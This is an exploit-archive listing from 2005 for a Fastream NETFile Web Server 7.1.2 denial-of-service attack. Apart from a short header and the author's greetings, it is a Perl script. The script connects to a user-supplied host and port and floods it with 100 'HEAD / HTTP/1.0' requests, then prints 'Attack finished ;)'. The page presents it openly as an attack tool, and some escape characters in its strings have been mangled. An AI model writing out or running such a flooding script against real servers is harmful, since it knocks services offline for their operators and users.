[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Fastream NETFile Web Server <= 7.1.2 (HEAD) DoS Exploit
# Published : 2005-09-16
# Author : Karak0rsan
# Previous Title : Stoney FTPd Denial Of Service Exploit (rxBot mods ftpd)
# Next Title : Snort <= 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit
#Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit
#Bug found by bratax ck
#Coded bY karak0rsan
#d0gma.org // unuver.com
#Greetz:hurby,phalaposher,l4m3r,Atak,spymaster,razor...
$host=$ARGV[0];
$port=$ARGV[1];
if(!$ARGV[1]){
print "Fastream FTP/Web Server DoSn";
print "Coded by karak0rsan // unuver.comn";
print "Usage:perl $0 [target] [port]n";
}
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldn't Connect!n";;
close($socket);
if($socket){
print "n";
print "[+]Attacking..!n";
}
for($i= 0; $i < 100; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket1 "HEAD / HTTP/1.0rnrn";
close($socket1);
}
print "Attack finished ;)n";
exit();
#EoF
# www.Syue.com [2005-09-16]